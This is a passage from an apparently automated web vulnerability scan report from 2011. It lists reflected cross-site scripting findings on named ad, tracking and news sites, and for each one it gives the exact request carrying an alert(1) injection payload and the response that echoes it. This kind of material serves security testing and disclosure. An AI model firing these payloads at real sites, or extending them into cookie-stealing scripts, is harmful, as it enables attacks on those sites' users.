X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Tue, 03-May-2011 02:44:57 GMT; path=/; domain=digg.com
Set-Cookie: d=dbc3b6621d940455b22731ca1a1c09a089781e5816736e7f487763dbd8526321; expires=Sat, 01-May-2021 12:52:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=950979 10.2.129.156
Vary: Accept-Encoding
nnCoection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17000

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00fac8d"><script>alert(1)</script>efc759f39a3.rss">
...[SNIP]...

7.23. http://guru.sitescout.com/tag.jsp [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcae3'%3balert(1)//08cf1cf24cb was submitted in the h parameter. This input was echoed as dcae3';alert(1)//08cf1cf24cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300&h=250dcae3'%3balert(1)//08cf1cf24cb&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:26:10 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250dcae3';alert(1)//08cf1cf24cb" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.24. http://guru.sitescout.com/tag.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797d2"%3balert(1)//dc8428cd2c7 was submitted in the pid parameter. This input was echoed as 797d2";alert(1)//dc8428cd2c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF797d2"%3balert(1)//dc8428cd2c7&w=300&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:30 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF797d2";alert(1)//dc8428cd2c7&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWC
...[SNIP]...

7.25. http://guru.sitescout.com/tag.jsp [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guru.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c758f'%3balert(1)//df004e2400e was submitted in the w parameter. This input was echoed as c758f';alert(1)//df004e2400e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag.jsp?pid=66738FF&w=300c758f'%3balert(1)//df004e2400e&h=250&rnd=3547377&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0IpipwdLQBxuLrYZgyJ7S1PvGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0/ HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ads-vrx.adbrite.com/adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 957
Date: Mon, 02 May 2011 02:25:50 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://guru.sitescout.com/disp?pid=66738FF&rw=1&cm=http%3A%2F%2Fclick.adbrite.com%2Fc%2FCvMCxYEuuBnWZTkIPVmBPewJ6aV85MACQqj-YPCxxOMqfurS0
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300c758f';alert(1)//df004e2400e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

7.26. http://hit.blvdstatus.com/t [tid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hit.blvdstatus.com
Path:   /t

Issue detail

The value of the tid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7241e'%3balert(1)//f5921333a0a was submitted in the tid parameter. This input was echoed as 7241e';alert(1)//f5921333a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /t?tid=BS-d8cfb33d-27241e'%3balert(1)//f5921333a0a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: hit.blvdstatus.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:15 GMT
Server: Apache
Content-Type: text/javascript
Content-Length: 2974

var __seoq_h = 'http://hit.blvdstatus.com';var __seoq_o = true;var __seoq_t = 'BS-d8cfb33d-27241e';alert(1)//f5921333a0a';var __seoq_s = 'sd8c4dbe198f6eff30.86464733';
function __seoq_get_host(x)
{var m;if(m=x.match(/(http|ftp|https):\/\/(.*?)\/.*$/)){return m[2];}}
function BLVD(){var c=this._Get_Cookie('blvdS');if(c){
...[SNIP]...

7.27. http://insurancenewsnet.com/article.aspx [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff3e7'%3balert(1)//1e4b9f7a9ac was submitted in the _TSM_HiddenField_ parameter. This input was echoed as ff3e7';alert(1)//1e4b9f7a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /article.aspx?_TSM_HiddenField_=ctl00_tsm_HiddenFieldff3e7'%3balert(1)//1e4b9f7a9ac&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3a865923e8%3a91bd373d%3a596d588c%3a411fea1c%3ae7c87f07%3abbfda34c%3a30a78ec5%3a42b7c466 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
Referer: http://insurancenewsnet.com/article.aspx?id=257992
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pddqwnm3cm5gjqvccrmz1345; INNid=pddqwnm3cm5gjqvccrmz1345

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Mon, 30 Apr 2012 23:34:39 GMT
Last-Modified: Wed, 27 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:34:39 GMT
Content-Length: 122119

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
false);
//END AjaxControlToolkit.PopupControl.PopupControlBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_tsm_HiddenFieldff3e7';alert(1)//1e4b9f7a9ac').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:865923e8:91bd373d:596d588c:411fea1c:e7c87f07:bbfd
...[SNIP]...

7.28. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68af2'%3balert(1)//795c1f771d3 was submitted in the admeld_callback parameter. This input was echoed as 68af2';alert(1)//795c1f771d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match68af2'%3balert(1)//795c1f771d3 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:38 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:10:18 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 404

document.write('<img width="0" height="0" src="http://tag.admeld.com/match68af2';alert(1)//795c1f771d3?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304734238&custom_user_segments=%2C11265%2C49026%2C49027%2C50185%2C4625%2C6551%2C10656%2C24493%2C30767%2C14769
...[SNIP]...

7.29. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa20"><script>alert(1)</script>f930ba57874 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4aa20"><script>alert(1)</script>f930ba57874&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:39 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:38 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2447822087988458761&fpid=4aa20"><script>alert(1)</script>f930ba57874&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.30. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 801c8"><script>alert(1)</script>131f7da3ea4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=801c8"><script>alert(1)</script>131f7da3ea4&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:10:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:10:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=4010451028652069296&fpid=4&nu=n&t=&sp=801c8"><script>alert(1)</script>131f7da3ea4&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

7.31. http://s28.sitemeter.com/js/counter.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 695f8'%3balert(1)//5ff8671c168 was submitted in the site parameter. This input was echoed as 695f8';alert(1)//5ff8671c168 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/counter.asp?site=s28japanator695f8'%3balert(1)//5ff8671c168 HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:36 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator695f8';alert(1)//5ff8671c168', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator695f8';alert(1)//5ff8671c168';
// ]]>
...[SNIP]...

7.32. http://s28.sitemeter.com/js/counter.js [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df6e'%3balert(1)//b8c17a2141b was submitted in the site parameter. This input was echoed as 3df6e';alert(1)//b8c17a2141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/counter.js?site=s28japanator3df6e'%3balert(1)//b8c17a2141b HTTP/1.1
Host: s28.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 01:57:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 02 May 2011 02:07:08 GMT
Set-Cookie: IP=173%2E193%2E214%2E243; path=/js
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s28japanator3df6e';alert(1)//b8c17a2141b', 's28.sitemeter.com', '');

var g_sLastCodeName = 's28japanator3df6e';alert(1)//b8c17a2141b';
// ]]>
...[SNIP]...

7.33. http://tomopop.com/index-ad-anime.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58591"><script>alert(1)</script>8ca5ec22d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40 HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:04:07 GMT
Server: lighttpd/1.4.28
Content-Length: 305146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
<a href="http://tomopop.com/index-ad-anime.phtml58591"><script>alert(1)</script>8ca5ec22d40?start=10">
...[SNIP]...

7.34. http://track.blvdstatus.com/js/track.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.blvdstatus.com
Path:   /js/track.php

Issue detail

